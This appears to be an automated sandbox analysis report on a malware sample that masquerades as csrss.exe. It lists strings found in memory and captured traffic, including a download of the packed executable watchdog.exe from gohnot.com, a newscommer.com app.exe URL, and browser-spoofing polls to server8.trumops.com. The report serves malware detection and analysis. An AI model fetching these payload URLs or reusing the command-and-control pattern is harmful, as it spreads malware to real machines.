Source: csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Nov 2021 00:57:46 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 3465Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mUdca%2FhPVx%2BcuIN0mD4co%2Fq%2B%2FeXbPU6Zq0S%2FW1p4uyl4SjDH8JZzFzI5IDyMwm0EeLJ8hLsHyRpILoj74RMKgCuPLLbsz17avF1sdGfbIzhrwOIhomElDn412zdD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6ac39180d8125c92-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1Host: server8.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Length: 652Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1Host: server8.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0Content-Length: 668Accept-Encoding: gzip
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 00:57:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bKtxxp476cwRWpL7PMsiOEiUQCqwyb3bZEaJ0AAlC%2FT9jGwQdvS7Se%2BfmHEOErvcAP%2B4zdZUYVGNLmzkEYvbf2eQj3YtbAsdfhB5eIGhFyxOPCEF4oO6j5HX%2FobEjzLNcm0pI2mw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac39101ef046927-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 00:57:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=gv8mampiuh95qf18cj0go9m89u; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RBPQOW%2BDKJcfajEWjUAp5sEAC%2F%2FnnEUjdXStK%2Byc0Yn65mfutwtYjwiIq%2BUlGvNK0I8GjSutN%2BRWb2fq4knditxLDLYpwlGC1tM5sB3%2F2PrElhih1ODR82MTA1P9qvUN7SYUkd8C"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac39121ec73701b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 00:58:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=4ujbsd6crmkskigbel52akbion; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ryIHSGUMxFPJ%2F1e4qghNO%2FLH6YHJuD1QQg3lP1u0%2BXF1eYpABsushydm506ZkuU1RkdCCxRbUIoxtS3RvmeD7XMScKD9Nd4FY3%2Bt%2Fz7lrD9OZ3nlNfnYz5B0JVNarhQrNImsp3fS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac392db8b07f407-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: csrss.exe String found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
Source: csrss.exe String found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)
Source: csrss.exe String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
Source: csrss.exe String found in binary or memory: http://builtwith.com/biup)
Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp String found in binary or memory: http://crl.g
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: csrss.exe String found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
Source: csrss.exe, 0000000E.00000003.380180308.000000001688A000.00000004.00000001.sdmp String found in binary or memory: http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393
Source: csrss.exe, 0000000E.00000003.376871175.0000000016B3E000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.378698151.000000001697C000.00000004.00000001.sdmp String found in binary or memory: http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe
Source: csrss.exe String found in binary or memory: http://grub.org)Mozilla/5.0
Source: csrss.exe String found in binary or memory: http://help.ya
Source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
Source: csrss.exe String found in binary or memory: http://misc.yahoo.com.cn/he
Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp String found in binary or memory: http://newscommer.com/app/app.exe
Source: csrss.exe String found in binary or memory: http://search.msn.com/msnb
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
Source: csrss.exe String found in binary or memory: http://www.alexa.com/help/webmasters;
Source: csrss.exe String found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
Source: csrss.exe String found in binary or memory: http://www.baidu.com/search/spide
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
Source: svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.comsv
Source: csrss.exe String found in binary or memory: http://www.bloglines.com)F
Source: csrss.exe String found in binary or memory: http://www.everyfeed.c
Source: csrss.exe String found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
Source: csrss.exe String found in binary or memory: http://www.google.com/adsbot.html)Encountered
Source: csrss.exe String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
Source: csrss.exe String found in binary or memory: http://www.google.com/bot.html)tls:
Source: csrss.exe String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
Source: csrss.exe String found in binary or memory: http://www.googlebot.com/bot.html)Links
Source: csrss.exe String found in binary or memory: http://www.spidersoft.com)Wget/1.9
Source: csrss.exe String found in binary or memory: http://yandex.com/bots)Opera/9.51
Source: csrss.exe String found in binary or memory: http://yandex.com/bots)Opera/9.80
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.comr
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp String found in binary or memory: https://blockchain.infoindex
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
